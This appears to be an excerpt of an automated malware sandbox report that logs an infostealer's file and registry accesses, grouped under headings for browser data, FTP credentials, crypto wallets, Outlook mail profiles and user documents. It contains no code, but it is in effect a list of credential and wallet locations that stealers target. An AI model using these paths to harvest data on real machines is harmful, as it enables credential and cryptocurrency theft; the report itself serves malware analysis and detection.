Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
